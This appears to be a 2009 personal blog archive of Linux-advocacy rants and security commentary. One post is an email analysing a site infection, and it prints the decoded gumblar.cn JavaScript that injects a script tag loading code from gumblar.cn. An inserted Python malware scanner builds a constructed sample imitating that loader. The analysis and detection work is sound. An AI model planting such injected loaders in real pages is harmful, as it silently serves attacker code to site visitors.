Microsoft has joined the community of Linux kernel contributors with the addition of its Hyper-V drivers, soon to appear in linux-next. "These drivers are to enable Linux to work better when running as a guest on top of the Hyper-V system. There is still a lot of work to do in getting this into "proper" mergable state, and moving it out of the staging directory..."

2009-07-18

the Qualcomm conspiracy...

or: why are CDMA phones so much more expensive and still look like crap?

My company, in its infinite wisdom, has decided that we should all switch to a CDMA platform. Now, for some reason I could never explain till now, I've always hated CDMA. Enough that I almost refused the company cell phone, though practical necessity finally won and I toed the line. [I mean, I already have a rep for saying "sorry, your stupid software doesn't work on Linux so I can't use it/join the conf call/whatever"; it would look terrible if I said "sorry, I can't call you at 9pm because I refused a company cell phone" :-)]

Anyway, getting back to my rant for the day/week, I spent a couple days looking at CDMA phones. Invariably, they look like crap compared to a similarly priced Nokia, and their UIs suck golf balls through chem lab pipettes, but meh, I'll manage.

Then I find a Nokia phone that does CDMA; something called the 6275. This has exactly the same features as my 3310 Classic GSM phone, except the camera is 2MP (versus 1.3MP on mine). Cool, I'm in heaven!

The cost? Just about double that of the GSM model, give or take a bit.

Now, some of you know about the long legal battle between Nokia and Qualcomm, and Qualcomm owns CDMA, so you're thinking, well duh! Why would they make it cheap for Nokia?

So fine, back to plan A -- I'll buy a Samsung. I just want MIDP because I got used to being on IRC whenever I'm forced to sit around at a boring place (ahem!).

Well guess what? the cheapest Samsung CDMA phone that has MIDP is more than 3X the cost of the cheapest GSM phone from Samsung.

Now if that is not because of Qualcomm taking their pound of flesh for CDMA technology itself, I don't know what it is.

Damn Qualcomm. And double-damn "Brew", their horrible, proprietary, expensive, apology of an excuse for Java competition. Including their "we have to control what runs on your phone" attitude too. I hope they all burn in hell. So much for market forces, what a load of crap...

Anyway, I have made a decision: I will only buy extremely low end CDMA phones, which do just the bare minimum (voice and SMS only), because I have to believe the profit margin on these can't be much. They'll never get a penny more from me than is absolutely, minimally, necessary.

----

and now, my "some reason I could never explain" seems vindicated! Dare I think myself so intuitive about these things that even my unreasoned prejudices end up having a rational explanation when you look deeper? Wow... :-)

2009-07-17

why basic infrastructure components should never be closed source...

...or at least, when they are not open source, you should treat them as hostile and malicious.

http://www.securityfocus.com/news/11555?ref=rss

excerpts:

An update pushed out to BlackBerry users on the Etisalat network in the United Arab Emirates appears to contain remotely-triggered spyware that allows the interception of messages and emails, as well as crippling battery life.

Interestingly, it seems it was the battery life that drew attention and investigation. This was a minor design error, easily fixed, and then no one would have noticed this application!

2009-07-14

Pinching myself and checking what year it is...

So I got an invite to join some call from a vendor trying to sell us something (I can't name names, and in this case they're irrelevant). They chose to send us an invite which included this:

https://www2.gotomeeting.com/join/[somelongnumber]

So I go there, and I see:

To join the Meeting, please use one of the following supported operating systems:
• Windows® 2000, XP Pro, XP Home, 2003 Server, Vista
• Mac OS® X, Panther® 10.3.9, Tiger™ 10.4.5 or higher

OK, I've seen this sort of crap before, and can often get around it using UA switcher or something, so I try that next.

Guess what? They want you to download and install an actual EXE!

So now this is like a flashback to at least 4 years ago. I hope webex, which now works pretty damn well inside FF on Linux, is eating their lunch!

Anyway, after a bit of searching I found a "support" url with a feedback form of some sort, so I sent them this:

I was supposed to join a call starting shortly, and find I cannot, because you don't support Linux. How quaint...

Well it's 8:30pm in India, where I am, so thanks for letting me off the hook on that call and really enjoying dinner with my family.

:-)

2009-07-05

EVMs again, in a real democracy...

http://www.greatandhra.com/ganews/viewnews.php?id=14612&cat=&scat=16

Not sure how terribly accurate that virtually unknown newspaper is, but a shorter version is at http://timesofindia.indiatimes.com/India/EVMs-can-be-easily-tweaked-Expert/articleshow/4739375.cms -- presumably an NYTimes style pay site or the dead-tree version would have the extra details that the greatandhra site shows.

The summary: some of the other political parties have been complaining that the EVMs can indeed be tampered with, and the EC (Election Commission) is looking into it very seriously, calling for meetings with officials of the two "public sector" companies (that's a phrase that basically means "majority owned by the government", although they do also trade on the stock markets like any other company), etc.

Even with no details of the "exploit", I feel very good about this.  Look at how they're handling it, compared to the Diebold situation in the US.  What I said in http://www.schneier.com/crypto-gram-0412.html#11 still stands -- the entities are public sector companies, and the EC is quite independent.  (Hopefully even with the current Election Commissioner, Naveen Chawla, being a corrupt Sonia Gandhi/Congress party lackey)

In the US, as far as I recall, things had to go to court before anyone could see how the damn things worked.

And even then, it wasn't the political parties who went to court (again, as far as I remember, please correct me in comments if I'm wrong) it was the EFF or something like that.  Another sign that an essentially 2-party system is not quite democratic enough.

Yes, a true multi-party system is much more chaotic, but as a friend of mine said, maybe it is easier to "fix" things when the number of players is small.

And oh by the way, a "true multi party system" is a common enough state of affairs in the open source world too.  Coincidence?  I think not!

(criminal) get paid for screwing up

wow... I must have been asleep under a rock these last few days.  I did not know this till today:

http://www.itwire.com/content/view/26018/1090/

Apparently an attack by the Conficker worm has cost the Manchester Council in England around £1.5 million - and Microsoft experts were among the consultants called in and paid some of that swag.

Nice job, guys.  Great business model.

Oh and for people who think this is not MS's fault, follow at least this link in the article... (ignore the comments, they're mostly crap.  Even in the article, there are only facts or questions, so you can certainly draw your own conclusions, don't go by his).

And what really, really, REALLY, pisses me off is that no mainstream news media reporting this will use the words "Microsoft" or "Windows" when describing the problem, leaving ordinary (non-IT) folks with the impression that this happens to all "computers".  Other people far more qualified than I have also noticed and ranted about this, but it makes no difference.  Damn...

2009-06-29

who's to blame?

http://thedailywtf.com/Articles/Death-by-Delete.aspx

interesting story.  I don't know how many readers I have (or still have, after that article on MBAs and ethics ;-) but I'm torn as to whom to blame for this.

Opinions?

2009-06-28

what are they all mourning?

I find it hard to digest all this mourning for Michael Jackson.  The "King of Pop" with the pulse-pounding beats and act died long ago; the person who died on Friday was no more than a shadow of his former self, and a dark, dangerous, shadow at that.  Mentally unstable, physically ravaged, and accused of probably the worst sort of crimes that a parent can imagine, I am so happy that my two children hardly know who he is.

Humans tend to hang on to their idols long after the idols have been found wanting.  Until we stop doing that, celebrities will continue to get away with murder, at least figuratively, if not literally.

2009-06-19

Re your column on "Courtesy crisis at workplace"

Dear Mr Banerjee,

I read your column in today's DC, Hyderabad edition.  I normally don't bother writing letters to editors or columnists, but there are some things I have strong feelings about, and then I have to.  I have no idea if there is any scope in your column for you to print your reader's comments, but that is upto you.

Linking the failure of Lehman or AIG with the informal culture of a US company, and conversely the success of the Tatas and Birlas with the opposite, is naive, to say the least.  Correlation does not, as they say, imply causation.

The correct causation for your examples is simple: all the failed companies you mention have ethics problems at the top.  All of them are run by MBAs who have been taught a badly skewed value system, one which maximises either their own, or their company's, worth in purely monetary terms.  I do not believe MBAs are even taught the basics of ethics or morality.  It's just not one of their priorities.  How else can we explain the dean of ISB brazenly voting for something that an average man on the street could easily see was unethical!

[You may wish to read http://www.timesonline.co.uk/tol/news/uk/education/article5821706.ece -- though it is directed at Harvard, I suspect most B-schools are the same anyway]

In contrast, if you take the people you've named (Tatas, Birlas, etc)., they all have a highly developed sense of ethics at the top levels, even a sense of "ownership".  Perhaps it comes from the fact that the firm carries their name!  Similarly, the old guard at Lehman would have had the same values too.  But they have long since given way, (due to pressures on the "Street" perhaps?) to the MBA crowd.  With the results we all see today.

Of course, it is certainly true that "old guard" people also tend to be more formal, that is quite a different matter entirely.

Warm regards,

Sitaram

PS: I work for a large IT company, I have nearly 23 years of experience, and I insist that everyone, even the freshers, call me Sita or Sitaram.  And I don't like people who insist on being called "Sir" or "Mr ..." or whatever.  It means their notion of "respect" is very shallow, and (often enough), also that they lack the ability to actually earn my respect anyway.

Of course, this means I have to work a little harder to uphold my dignity and authority.  Once in a while someone will mistake my attitude for weakness and take liberties, or cross some other invisible line, and will need to be pushed back firmly.  I have to be constantly on the watch for such issues.

Why then do I do this?  Would it not be better to "act my age"?  After all, some of my team members are barely a few years older than my son!

Because it helps them open up.  Even in a formal meeting, being able to call me Sita gives them just that extra bit of confidence to tell me what they really think of something I am proposing, or seconding.  It helps them say "Sita, I don't think that would work".  It gets them asking just that one extra question that tells me something is wrong, or has been misunderstood, or points to a problem the project will have way down the line.  In short, it gets me feedback I'd never have got otherwise, or would have to guess at from other signals or behaviour.

And yes, I have gone drinking with people who report to me and are very junior to me.  It's not that difficult to be one of the lads without all the negative fallout you seem to impute to it.  You just have to be fair, honest, and firm.

2009-06-11

Malware Steals ATM Data

...all you Linux people think you're safe from us?

MUA-HA-HA-HA!

via Schneier on Security by schneier on 6/10/09

One of the risks of using a commercial OS for embedded systems like ATM machines: it's easier to write malware against it:

The report does not detail how the ATMs are infected, but it seems likely that the malware is encoded on a card that can be inserted in an ATM card reader to mount a buffer overflow attack. The machine is compromised by replacing the isadmin.exe file to infect the system.

The malicious isadmin.exe program then uses the Windows API to install the functional attack code by replacing a system file called lsass.exe in the C:\WINDOWS directory.

Once the malicious lsass.exe program is installed, it collects users account numbers and PIN codes and waits for a human controller to insert a specially crafted control card to take over the ATM.

After the ATM is put under control of a human attacker, they can perform various functions, including harvesting the purloined data or even ejecting the cash box.

2009-05-23

(malware) walk too loudly...

Well there you have it, straight from the horse's mouth :-)

http://www.infoworld.com/d/windows/your-companys-apps-incompatible-windows-7-shim-them-says-microsoft-394

Microsoft has long created its own shims rather than making laborious bug fixes to Windows' oft-brittle code.

"If you walk too loudly down the hall near the [Windows] kernel developers, you'll break 20 to 30 apps," Jackson joked.

2009-05-22

linux users are missing all the fun :-)

http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

  • Steals FTP credentials
  • Sends SPAM
  • Installs fake anti virus
  • Highjacks Google search queries
  • Disables security software

2009-05-14

why open source is important...

http://www.schneier.com/blog/archives/2009/05/software_proble.html

quoted verbatim from Bruce Schneier's blog (link above).  I hope he doesn't mind -- I'm doing this because this is really important, and I know some of my readers don't click on links (you know who you are!)

----------------------------

Software Problems with a Breath Alcohol Detector

This is an excellent lesson in the security problems inherent in trusting proprietary software:

After two years of attempting to get the computer based source code for the Alcotest 7110 MKIII-C, defense counsel in State v. Chun were successful in obtaining the code, and had it analyzed by Base One Technologies, Inc.

Draeger, the manufacturer maintained that the system was perfect, and that revealing the source code would be damaging to its business. They were right about the second part, of course, because it turned out that the code was terrible.

2. Readings are Not Averaged Correctly: When the software takes a series of readings, it first averages the first two readings. Then, it averages the third reading with the average just computed. Then the fourth reading is averaged with the new average, and so on. There is no comment or note detailing a reason for this calculation, which would cause the first reading to have more weight than successive readings. Nonetheless, the comments say that the values should be averaged, and they are not.

3. Results Limited to Small, Discrete Values: The A/D converters measuring the IR readings and the fuel cell readings can produce values between 0 and 4095. However, the software divides the final average(s) by 256, meaning the final result can only have 16 values to represent the five-volt range (or less), or, represent the range of alcohol readings possible. This is a loss of precision in the data; of a possible twelve bits of information, only four bits are used. Further, because of an attribute in the IR calculations, the result value is further divided in half. This means that only 8 values are possible for the IR detection, and this is compared against the 16 values of the fuel cell.

4. Catastrophic Error Detection Is Disabled: An interrupt that detects that the microprocessor is trying to execute an illegal instruction is disabled, meaning that the Alcotest software could appear to run correctly while executing wild branches or invalid code for a period of time. Other interrupts ignored are the Computer Operating Property (a watchdog timer), and the Software Interrupt.

Basically, the system was designed to return some sort of result regardless.

This is important. As we become more and more dependent on software for evidentiary and other legal applications, we need to be able to carefully examine that software for accuracy, reliability, etc. Every government contract for breath alcohol detectors needs to include the requirement for public source code. "You can't look at our code because we don't want you to" simply isn't good enough.
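Here is the arithmetic from points 2 and 3 reproduced as an added illustration (my own code, not from the Alcotest firmware, the Base One report or Schneier's post), on constructed readings: the running pairwise average beside the true mean, the effective weight each reading gets under that recurrence, and how many distinct values survive the divide-by-256 step on a 12-bit range.

```python
from fractions import Fraction

# Added example: reproduces the arithmetic described in points 2 and 3 above on
# constructed readings; it is not code from the Alcotest or the Base One report.


def true_mean(readings):
    """Ordinary arithmetic mean: every reading carries weight 1/n."""
    return Fraction(sum(readings), len(readings))


def running_pairwise_average(readings):
    """The recurrence the analysis describes: average the first two readings,
    then average each further reading with the result so far."""
    if not readings:
        raise ValueError("need at least one reading")
    acc = Fraction(readings[0])
    for r in readings[1:]:
        acc = (acc + r) / 2
    return acc


def effective_weights(n):
    """Weight each of n readings ends up with under that recurrence, obtained
    by pushing unit vectors through it (the recurrence is linear)."""
    weights = []
    for k in range(n):
        unit = [0] * n
        unit[k] = 1
        weights.append(running_pairwise_average(unit))
    return weights


ADC_MAX = 4095  # 12-bit converter range quoted in the analysis


def quantize(raw, divisor=256, halve=False):
    """Integer-divide a raw ADC reading by 256 as the analysis says the firmware
    does; halve=True models the extra division on the IR path."""
    v = raw // divisor
    return v // 2 if halve else v


def distinct_outputs(divisor=256, halve=False):
    """How many different result values the whole 12-bit input range can produce."""
    return len({quantize(raw, divisor, halve) for raw in range(ADC_MAX + 1)})


if __name__ == "__main__":
    readings = [2000, 2000, 2000, 3000]  # constructed raw readings
    print("true mean          :", true_mean(readings))
    print("pairwise recurrence:", running_pairwise_average(readings))
    print("weights, n=4       :", [str(w) for w in effective_weights(4)])
    print("distinct outputs   :", distinct_outputs(), "fuel cell,",
          distinct_outputs(halve=True), "IR")
```

Pushing unit vectors through the recurrence gives the weights directly: for four readings they are 1/8, 1/8, 1/4, 1/2, so the readings are not weighted equally and the result changes with the order in which they were taken. The quantization functions give the 16 distinct outputs (8 on the halved IR path) that the analysis counts.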


2009-05-12

advice to someone recovering from an attack

Dear <deleted>,

on <deleted>, <deleted> wrote:

Dear Sitaram,

Thanks again for taking time for us.
This is really helpful info and as we have discussed FTP and compromised client PC's seems to be the culprit.

We have taken following steps:

<deleted specifics of Windows protection measures taken, as well as remote access changes>

It will be very helpful if you can help us to formulate and implement an IT security guide line.

Sorry for a long-winded, rambling, reply, but basically, a guideline cannot be created just like that.  You'll have to take the basic assumption (which is: if it is possible, it will happen!), and use that to pinpoint all the places where you can get attacked, and then come up with a plan.  With that caveat, here're some random thoughts in response to your email.

(1) Taking all those steps to protect windows is good but at the end of the day it is basically insecure.  The legacy of "one user per machine" is deep inside Windows, and cannot be easily overcome.  Linux and other Unixes (FreeBSD, NetBSD, Solaris/OpenSolaris, etc) -- while apparently more difficult -- start with the multi-user mentality, which is inherently more secure (see footnote).

The sooner people realise this and move on, the better.  When I find a Windows dependency, I take it as a sign that the other thing, (not I), has to change.  If I can change it, I will.  If I cannot, I put Windows in a Virtual Machine running inside Linux, make sure all data on Windows is transient, and rollback the virtual machine once a week or so.  No virus can get past that :-)

(2) Most of the problems come from the web.  All your Symantec protection may not be sufficient to detect if your web browser is silently going to a malware host like gumblar.cn.  How do you know that it isn't doing so?  You can test this one because you know about it.  How will you test all the others that you don't know?

(3) AV companies are, by nature, reactive.  You are paying for the hope that (i) they discover the bad site, (ii) update their signatures, and (iii) let you download the updates, all of this before the bad site discovers you!  This is difficult.  Most people who say "I never got hacked" don't realise that this is only by pure chance!

(4) The best security policy is one that assumes you will be attacked.  Let me give you a somewhat extreme example: here's how I deal with it.

  1. I run Linux everywhere, and Windows restricted only if absolutely needed as described above.
  2. Even in Linux, Firefox is not immune to Javascript hacks.  Most of the hacks coming through JS are directed at exploiting Windows holes, but I assume there may be some unknown Linux one also somewhere (nothing is perfect you know!)  So I do my normal browsing as some other user (a very "no rights" userid called "ff" I created just for firefox).  Pubkey auth allows "sitaram" to run ssh commands as "ff", so typically my firefox will start as "ssh ff firefox" instead of "firefox".  The setup is one-time, and very easy.
  3. This means, even if someone compromises my firefox browser, he only gets access to that userid (which contains no files of any real use), not "sitaram" (which is where all my files and email etc are).
  4. Even then, I run with NoScript and AdBlockPlus, enabled.  By default, no site gets JS on my browser.  Normally, if a site insists on JS, I mentally thank them for saving me some time and move on :-)  If I need that site more than it needs me, then I allow JS on that site.  Temporarily.  NoScript makes this very easy.
  5. The "sitaram" userid never runs a web browser except to specific sites (like my company intranet portal, and my bank, irctc for train tickets, etc).  Basically, anything that has personally/financially important info runs from this userid, all general browsing (including slashdot, for example) runs from the other id.  This is far more separation than Chrome can give you; it's two completely different users, in an OS that (as I said before) knows how to separate users properly.
  6. Both firefoxes are set to delete all data except browsing history when the browser closes, and never to save passwords.  That's a one time preference setting.  Like the old Hero Honda ads used to say, fill it, shut it, forget it :-)
  7. No two sites I log onto have the same password or even similar password.  This is a tough one in practice, I agree, but it has to be done.  If someone manages to find out your yahoo password they should not be able to gain access to your gmail :-)
  8. People say "you should never write down passwords".  Bullshit.  You can safely write down subtle hints/reminders or simple variations with extra noise etc. -- just sufficient to refresh your memory.  It's a lot easier to protect a physical thing (a piece of paper in your wallet) than the stuff you can't see.  In my case, the people who have physical access to my wallet are people I already trust or who will never make any sense out of a random set of meaningless characters.  This is a lot safer than using the same password for unrelated sites because you find it difficult to remember so many!

OK enough rambling.  But you cannot imagine how much all of this will protect you compared to all the reactive Symantec style stuff.  Of course, if (for example), icicibank.com gets infected by the gumblar.cn style attack, then I have a big problem!  I'll talk later about how one can protect against that.

I hope I have given you some food for thought.  We can talk about this in more detail later this week, if you wish.

Regards,

Sitaram

(*)  Why are they inherently more secure?  They start with the assumption that each user, and the OS itself, must be protected from the other users' actions.  Although recent Linux distributions have diluted this a bit to cater to the Windows crowd, the basic premise is still the same and still works.




Sitaram Chamarty wrote:
Dear <deleted>,

The base 64 coded stuff in the first file decodes to an obfuscated Javascript, which -- when again decoded -- becomes:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+">

The second file has similar obfuscated JS; at a quick glance, (and knowing some of the hex codes of ASCII characters) it looks the same as the previous one, and in particular does have "gumblar.cn" in it.

So, we have "gumblar.cn".  A quick google on that gives me a lot of stuff, in particular http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ which bears out my initial estimate that this happened due to insecure ftp.  I strongly suggest you go through that entire page asap, especially the comment  http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/#comment-916

http://www.bleuken.com/2009/05/06/removal-and-prevention-of-gumblarcn-infection/ and others also say that infection starts from the local PC used to upload.

Seriously, if you don't need Windows, ditch it.  Ditch it for all but the most needed functions, and keep them air-gapped (meaning they pass data onto a bastion host running Linux, the stuff gets checked there -- visual inspection of all code if needed -- and then it moves from there using only pubkey access to the server).

And really, any hosting provider who does not give you ssh access should be out of business.  This is 2009 :-)

Regards,

Sitaram
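As an added example (my own code, not the scripts or files discussed in the email above), here is a small scanner that peels the kinds of layers described there: a base64 blob, a percent-escaped string, \xNN and String.fromCharCode runs, recursively, and reports the external hosts and eval/write calls found in any layer. The injected PHP it runs on is constructed for the example; the innermost payload imitates the shape of the decoded script above rather than reproducing it.

```python
import base64
import os
import re
from urllib.parse import unquote

# Added example: a small scanner for injected, layered-encoded script, not the
# files or tools from the email above. The sample below is constructed for the
# example: a PHP file with a base64-wrapped eval() whose body emits a <script>
# that percent-escapes the real payload. The payload imitates the shape of the
# decoded snippet above; it is not a copy of the actual injected code.
PLAIN_JS = (
    'var u=navigator.userAgent;if(u.indexOf("Win")>0){'
    'document.write("<script src=//gumblar.cn/rss/?id="+j+"></scr"+"ipt>");}'
)
LAYER2 = "echo '<script>eval(unescape(\"%s\"))</script>';" % "".join(
    "%%%02x" % b for b in PLAIN_JS.encode()
)
SAMPLE_PHP = '<?php $x="%s"; eval(base64_decode($x)); ?>\n<html><body>site</body></html>' % (
    base64.b64encode(LAYER2.encode()).decode()
)

BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PCT_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
HEX_RE = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
SUSPICIOUS = ("eval(", "unescape(", "base64_decode(", "document.write(")


def _peel(layer):
    """Yield every string recoverable from one layer by undoing base64,
    %xx, \\xNN and String.fromCharCode encodings found in it."""
    for m in BASE64_RE.finditer(layer):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # a long hash or token, not base64 text
    for m in PCT_RE.finditer(layer):
        yield unquote(m.group(0))
    for m in HEX_RE.finditer(layer):
        yield bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1")
    for m in CHARCODE_RE.finditer(layer):
        codes = [c.strip() for c in m.group(1).split(",") if c.strip()]
        yield "".join(chr(int(c)) for c in codes)


def decode_layers(text, max_depth=5):
    """Return the text plus every layer peeled from it, breadth first, until
    nothing new decodes or max_depth is reached (obfuscators nest these)."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        found = []
        for layer in frontier:
            for s in _peel(layer):
                if s not in layers and s not in found:
                    found.append(s)
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def scan(text):
    """Summarise the decoded layers: count, suspicious calls seen in any
    layer, external hosts referenced, and the innermost layer."""
    layers = decode_layers(text)
    calls = sorted({c for layer in layers for c in SUSPICIOUS if c in layer})
    hosts = sorted({m.group(1) for layer in layers for m in HOST_RE.finditer(layer)})
    return {"layers": len(layers), "calls": calls, "hosts": hosts, "final": layers[-1]}


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and report every file whose decoded layers reference a
    host or contain more than one layer of encoding."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan(fh.read())
                if result["hosts"] or result["layers"] > 1:
                    hits[path] = result
    return hits


if __name__ == "__main__":
    r = scan(SAMPLE_PHP)
    print("layers:", r["layers"], "calls:", r["calls"], "hosts:", r["hosts"])
    print("innermost:", r["final"])
```

On the constructed file the scanner peels three layers and reports gumblar.cn from the innermost one; a page with no encoded blobs comes back as a single layer with no hosts. Pointing scan_tree at a web root after an incident of this kind gives a quick list of files to diff against a clean copy, which is the manual step the email describes.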

2009-05-06

gratuitous Javascript

Someone sent me a link to an article on indiatimes.com, especially pointing out something about the comments.  My reply:

---------------------

I can't see any comments; they are obscured by needless, meaningless, gratuitous, Javascript.

The amazing thing is that the comment leaders load along with the main page.  They're just not **visible** unless you have JS turned on.  In other words, they made an effort to **actively hide them** unless you have JS turned on -- it wasn't just an artefact of whatever brain dead web development software they're using.

My policy on JS is this: if I absolutely **must** use the site (like my bank, railway reservations, bill payments, and Ultamatix) I will turn it on.  Otherwise, a site that requires JS can do without my viewership and patronage.

And I most certainly will **not** switch on Javascript for a fluff rag like the TOI.  What happened once can happen again.

2009-05-03

so this is how they get their jollies...

do the terrorists know their religion is being side-tracked?

http://yro.slashdot.org/comments.pl?sid=1218935&cid=27788361

Oh and if you think this is unsubstantiated, just google for it using some appropriate keywords; you'll find plenty of corroboration.

2009-04-21

truecrypt and its dangerous license

http://article.gmane.org/gmane.comp.freedesktop.distributions/275

Note especially the last few paras, in particular, "Our counsel advised us that this license has the appearance of being full of clever traps, which make the license appear to be a sham (and non-free)."  That's pretty strong language for a lawyer to make!  Also read the analysis of the simple clause: "NOTHING IN THIS LICENSE SHALL IMPLY OR BE CONSTRUED AS A PROMISE, OBLIGATION, OR COVENANT NOT TO SUE FOR COPYRIGHT OR TRADEMARK INFRINGEMENT"

My advice: use the normal Linux mechanisms -- dm-crypt, cryptsetup, and LUKS.

Forget about plausible deniability -- that's a load of fertiliser these days, since that feature has been touted so often in so many fora that the fact that you have truecrypt installed can mean they ask you for your second password :-)

If you're on Windows, buy a commercial license (although I suspect that may also have the same clause in it!), or use some competing product, or forget about encryption.

Or use Windows bitlocker :-)  Your data will be very safe.  If your hardware changes in any way, it will be safe even from you :-)

2009-03-31

python moves to Hg (surprise!)

No surprise, but here's a real surprise:

quote: As git proponent, I had placed some comments in the usage scenarios explaining what was happening, and got a *lot* of pushback.  The basic workflow should involve *no* thought *at all*, that was a common position.  Even comments on theory of operation are a bad sign.  The closer the workflow scenarios approximated "no change in thinking" (== no thought at all in the ideal), the better.  People didn't even care to find out if it *was* complex, the mere scent of complexity put them off.
wow...!  Why even bother to convert from SVN then?  As someone who's trying to propagate git in $DAYJOB, I can understand this sort of reaction, but from a FOSS project?

And I didn't see a rebuttal of this post in the rest of the thread either...

2009-03-30

(MBA) 360 Degree Feedback Survey for someone joining ISB

I did someone's "evaluation" for admission into ISB (actually the person has already got admission so this is somewhat less critical).

One of the questions was: "To sum up, what advice would you have for this individual on becoming more effective as a leader?".  Now, the person in question is a very soft-spoken, unaggressive, person (as far as I can see -- I could be wrong), so here's what I wrote:

My answer:  as an MBA, he may be called upon to take decisions that he will later have to defend (like perhaps why he voted a certain way in a certain board meeting ;-)  Even if he's right, he has to be able to defend his stance against more outspoken people.  Defending himself if he's actually wrong could be the next step.

:-)

B-schools don't teach ethics anyway, so hopefully they have at least developed a thick skin...

2009-03-26

(funny quote) Dorothy Parker on some book...

"This is not a novel to be tossed aside lightly. It should be thrown with great force."

2009-03-24

(standards/drivers) new hardware and linux

http://blogs.gnome.org/dcbw/2009/03/20/thats-when-i-reach-for-my-revolver/

This is a very entertaining article on why your new hardware sometimes doesn't work in Linux, written by one of the guys in charge of the "NetworkManager" applet.

Even if you're not a techie, you can still read it to get a flavour for the kind of problems these guys have supporting the same basic thing in a dozen different ways!

2009-03-23

(funny) six of one and a half-dozen of the other

via Jokes2Go Daily Humor on 3/21/09

Recently, when I went to McDonald's. I saw on the menu
that you could have an order of 6, 9 or 12 Chicken
McNuggets. I asked for a half dozen nuggets. "We
don't have half dozen nuggets", said the teenager at
the counter. "You don't?" I replied. "We only have
six, nine, or twelve," was the reply "So I can't
order a half-dozen nuggets, but I can order six?"
"That's right." So I shook my head and ordered six
McNuggets.

2009-03-20

(funny) Look Out, Firefox 3 --- IE8 Is Back On Top For Now


All alone
by AKAImBatman (238306)

IE8 Is Back On Top For Now

You know that kid who rushes to the top of the hill, just knowing that he's finally going to win King of the Hill for the first time ever? Then when he gets to the top of the hill, he's elated when he realizes he's at the top... only to realize a few moments later that all the other kids ran up a different hill?

That's Microsoft.

2009-03-16

(standards) differences between IE7 and IE8

Apparently spurred by the imminent release of Internet Explorer 8, Microsoft's IE Team has published a list of differences between IE7 and IE8, and how to fix code so that it will work on both: http://blogs.msdn.com/ie/archive/2009/03/12/site-compatibility-and-ie8.aspx

And if you know someone who still (even today) needs proof that the existing IE 7 and below were grossly non-compliant with standards, pass this on to them too.

They don't need to understand HTML or JS or the DOM to appreciate this. This MS blogger is quite honest and upfront about it. Here's a quote; note the repeated use of the phrase "Standards mode", and their recommendation of the "best option in the long run" :-)

We see the majority of compatibility issues in IE8 Standards Mode. Most of these occur when sites expect legacy behavior that no longer exists in IE8 Standards Mode. Upgrading your site to run in IE8 Standards Mode is the best option in the long run, but in the interim you can quickly fix these types of issues by running your site in Compatibility Mode.

2009-03-12

(MBA) 3 letters to hell -- Masters of the Business Apocalypse

The best thing I learnt today: that George W Bush had an MBA from Harvard -- he is in fact the only US president to have an MBA, thus proving forever that MBAs (at least from Harvard) are worse than lawyers from anywhere. All lawyer jokes shall henceforth be treated with the following perl recipe:

perl -pi -e 's/lawyer/Harvard MBA/gi'

----------------------------

other expansions of "MBA" from http://www.timesonline.co.uk/tol/news/uk/education/article5821706.ece :

Mediocre But Arrogant
Mighty Big Attitude
Me Before Anyone
Management By Accident

----------------------------

One quote from the article reflects what I have been saying all along, that MBAs are not taught ethics.

During my time at the school, 50 students were chosen to participate in a detailed survey of their development. Scott Snook, the professor who ran it, reported that about a third of students were inclined to define right and wrong simply in terms of what everyone else was doing. "They can't really step back and take a critical view," he said. "They're totally defined by others and by the outcomes of what they're doing."

When I asked someone how the dean of ISB would explain to his students why he voted the way he did on Dec 16th or thereabouts, the answer I got was "what's to explain? The word 'Ethics' starts with a Z in the MBA dictionary...". (I'm not telling you who said this to me; he was not an MBA anyway)

----------------------------

A personal note. A few people I personally love very much are MBAs. You know who you are. You (and I) know what your job is and that it is nothing remotely like the stuff described in that article.

2009-03-10

2009-03-03

(git) sourceforge and git

In a very interesting move, sourceforge, which till now only supported Subversion (SVN), is now supporting git-hosted projects.

http://apps.sourceforge.net/trac/sitedocs/wiki/Git

Just in case it isn't obvious, Sourceforge is owned by collabnet -- the people behind...

[scroll down for the answer]
































































...SVN :-)

2009-02-27

(funny,wow) a phone that you can dump into boiling coffee and it still works?

http://www.reghardware.co.uk/2009/02/26/review_mobile_phone_sonim_enduro_xp3/print.html

But the really funny part was this quote:

"However, don't expect to listen to music on the Enduro despite the
volume attainable: the MP3 player lacks any kind of recognisable
interface, even the hardware volume buttons don't work with an MP3. When
questioned about the lack of interface, the chaps from Sonim expressed
surprise that the handset had any MP3-playback capability at all. Bonus!"

2009-02-17

(funny) rouge routers

Someone posted a comment where he talked about a rouge (sic) router causing connectivity problems. The predictable result:

http://tech.slashdot.org/comments.pl?sid=1130227&cid=26880003

2009-02-14

(malware) high blood pressure

http://blog.linuxtoday.com/blog/2009/02/i-give-up-peopl.html

...a tech-journo gets high blood pressure. I would be in the same situation, but I'm slowly learning to take a somewhat detached view. I'll protect my stuff, help anyone who asks, but otherwise stay out of the way. Stick to local evangelism, forget about global evangelism.

This change of heart is sponsored by the enormous amount of cluelessness around me. Carla gave up today. I gave up approximately 2 weeks ago.

fz-uubss

2009-02-13

(funny,quote) what can go wrong?

The major difference between a thing that might go wrong and a thing which cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at or repair

